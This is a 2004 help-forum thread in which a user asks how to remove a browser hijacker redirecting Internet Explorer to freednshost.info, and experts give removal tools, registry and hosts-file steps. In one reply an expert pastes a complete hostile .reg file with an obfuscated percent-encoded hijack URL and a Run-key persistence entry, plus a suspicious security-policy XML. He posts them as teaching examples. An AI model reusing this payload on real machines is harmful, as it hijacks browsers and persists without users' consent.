Solved

Unknown virus or malicious file

Posted on 2004-04-27
12
4,266 Views
Last Modified: 2007-12-19
       I have  a serious problem. I believe I've been infected by something  that seems to act like adware, like a virus and a cookie at the same time. It makes my Internet Explorer run unproperly. What it does is that it sets my web homepage as freednshost.info and every time I change it to another webpage as soon as I close the program and open it again its back to freednshost.info. Also every time I click a link on any Internet webpage it will send me to that same page, freednshost.info and I get some sort of search engine with an irritating little stick man dancing up and down on the page. This virus also puts unsolocited Internet Explorer shortcuts on my active desktop and it shows mortgage ads on my options menu in Internet Explorer.
 

I've tried everything. I've scanned my computer. Looked for the infected file manually and I've downloaded the latest virus definitions for my Norton Antivirus but it doesn't seem to help.
 What do I do?
0
Comment
Question by:datinfo
12 Comments
 
LVL 49

Expert Comment

by:sunray_2003
ID: 10934730

After installing them, First Update them and then run

Spyware/Adware removal tools:
------------------------------

What is spyware : http://www.spychecker.com/spyware.html

SpyBot-S&D : http://www.safer-networking.org/

Ad-aware : http://www.webattack.com/download/dladaware.shtml

CWShredder: http://www.softpedia.com/public/cat/10/17/10-17-150.shtml

HijackThis : http://www.spychecker.com/program/hijackthis.html
0
 
LVL 49

Expert Comment

by:sunray_2003
ID: 10934732
Check these registry entries

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Search Bar
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Search Page
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
HKCU\Software\Microsoft\Internet Explorer\SearchURL
HKCU\Software\Microsoft\Internet Explorer\Main\Default_Page_URL
HKCU\Software\Microsoft\Internet Explorer\Main\Default_Search_URL
HKCU\Software\Microsoft\Internet Explorer\Search\SearchAssistant
HKCU\Software\Microsoft\Internet Explorer\Search\CustomizeSearch
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Search Bar


and remove  freednshost.info .. before doing that backup your registry
0
 

Author Comment

by:datinfo
ID: 10934758
Thanks! That was really fast! I just posted the question! I honestly didn't expect such a fast answer!
0
 
LVL 49

Accepted Solution

by:
sunray_2003 earned 125 total points
ID: 10934761
Also check the host file

Windows 95/98/Me c:\windows\hosts

Windows NT/2000/XP Pro  c:\winnt\system32\drivers\etc\hosts

Windows XP Home c:\windows\system32\drivers\etc\hosts


and make sure only the below is present

localhost  127.0.0.1


0
 
LVL 49

Expert Comment

by:sunray_2003
ID: 10934762
datinfo,
> I honestly didn't expect such a fast answer!

You will be surprised every time you post .. Ofcourse i should be online. LOL !!
0
 
LVL 49

Expert Comment

by:sunray_2003
ID: 10935166
Thanks for the super fast feedback
0
6 Surprising Benefits of Threat Intelligence

All sorts of threat intelligence is available on the web. Intelligence you can learn from, and use to anticipate and prepare for future attacks.

 

Expert Comment

by:knuthf
ID: 10982115
Whoops,
You forgot the most important key of the all: The "RUN" keys.
(RUN/RUNONCE). - In particular:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run
If this has a value e.g.
            sys    REG_SZ  "regedit -s sys.reg"
Delete this - and any other line that does not belong to anything you want to start.
Search the %WINDIR% directory for files recently updated- same with e.g. WINNT\system32. The last files updated should only be the Perfomance log files.

Your "sys.reg" is downloaded from a site that I am trying to find - the problem is that it first installs itself as a IE "Cookie" in the temporary Internet files - and then after a while it is move. I had the following installed on February 26 - to wake up on April 17 at 19:40 - and slip through all virus scanners:

REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"HOMEOldSP"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"Search Bar"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
"Search Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"HOMEOldSP"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"Search Bar"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
"Search Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"PrivacyAdvanced"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"sys"="regedit -s sys.reg"

----------------
That is one. The other is
<?xml version="1.0"?>
<securitypolicy version="1">
      <fwdebuglog debugflags="0x00000000" maxdebuglog="0"/>
      <lockupinfo server="208.185.174.60" port="0" enable="true"/>
      <startuphookafd wsockvermajor="0x00050000" wsockverminor="0x089319cb" enable="true"/>
                  <processes>
            <process name="fssm32.exe" openprocessaction="allow">
                  <md5table>
                        <md5hex>91feb4e9-8cf1e8e5-4f6f306a-e1399374</md5hex>
                        <md5hex>2f856f29-4d155a8c-c4ebb124-3bfeb9d4</md5hex>
                        <md5hex>6ea475f6-d34c3c6d-7a8a6845-a525d6e6</md5hex>
                  </md5table>
            </process>
      </processes>
</securitypolicy>
...
- but where the ip address is a dead give-away: here ZoneLabs to fetch an executable.
Use Security Policy to avoid change of the RUN keys - some tools like PortPro will guard the keys and notify before they are changed. The WEB pages are malicious - and most believe that virus spread with mail attachment.

I have in another response recommended that all file names in "system32" be changed with e.g. 1st and 4th letter uppercase - rest lowercase. You make some convention that allows you to see in Taskman when an intrusion has been made - e.g. the fssm32.exe above would not be FssM32.exe - so KILL IT.

Make your own search page - distribute this - or force everyone to Google - then "Brand" IE - that inhibits all users to change searchpage, homepage and security settings.
0
 

Expert Comment

by:knuthf
ID: 10982130
I know I posted a virus.
But I believe in educating by real examples, not just mumble jumble talking.
Please beware - it is a virus that will set IE to search somewhere else.
0
 

Expert Comment

by:knuthf
ID: 10982160
IP address resolution:
See http://www.geektools.com/whois.php

It is good because it links in with the regional whois databases.

Another tool is the ID server found at www.grc.com - Steve Gibson's page.
0
 

Expert Comment

by:mormanb
ID: 11136352
i am not able to delete the vsconfig.xml . It says process is being used by another process.   I restored my registry, how can i get rid of this vsconfig.xml ?
0
 

Expert Comment

by:knuthf
ID: 11163949
Rename to e.g. vsconfig.xml.vir - designate open/edit of .vir to Notepad.

Delete *.vir next time you have rebooted the system.

This also allows you to rename files that you do not trust - and inhibit these from being loaded at boot-up. You can now inspect with suited tools - and if the file is e.g. part of MS administrative tools, then you just rename the file - back to vsconfig.xml...
0
 

Expert Comment

by:knuthf
ID: 11163974
Identify the files you have verified with a combination of uppercase/lowercase names.
E.g. to VscOnfig.xml - described in another posting - here first and fourth char in upper case.
0

Featured Post

Free Trending Threat Insights Every Day

Enhance your security with threat intelligence from the web. Get trending threat insights on hackers, exploits, and suspicious IP addresses delivered to your inbox with our free Cyber Daily.

Join & Write a Comment

If you're not part of the solution, you're part of the problem.   Tips on how to secure IoT devices, even the dumbest ones, so they can't be used as part of a DDoS botnet.  Use PRTG Network Monitor as one of the building blocks, to detect unusual…
Big data transfers via information superhighways require special attention and protection. Learn more about the IT-regulations of the country where your server is located. Analyze cloud providers and their encryption systems for safe data transit. S…
Sending a Secure fax is easy with eFax Corporate (http://www.enterprise.efax.com). First, Just open a new email message.  In the To field, type your recipient's fax number @efaxsend.com. You can even send a secure international fax — just include t…
Here's a very brief overview of the methods PRTG Network Monitor (https://www.paessler.com/prtg) offers for monitoring bandwidth, to help you decide which methods you´d like to investigate in more detail.  The methods are covered in more detail in o…

705 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

20 Experts available now in Live!

Get 1:1 Help Now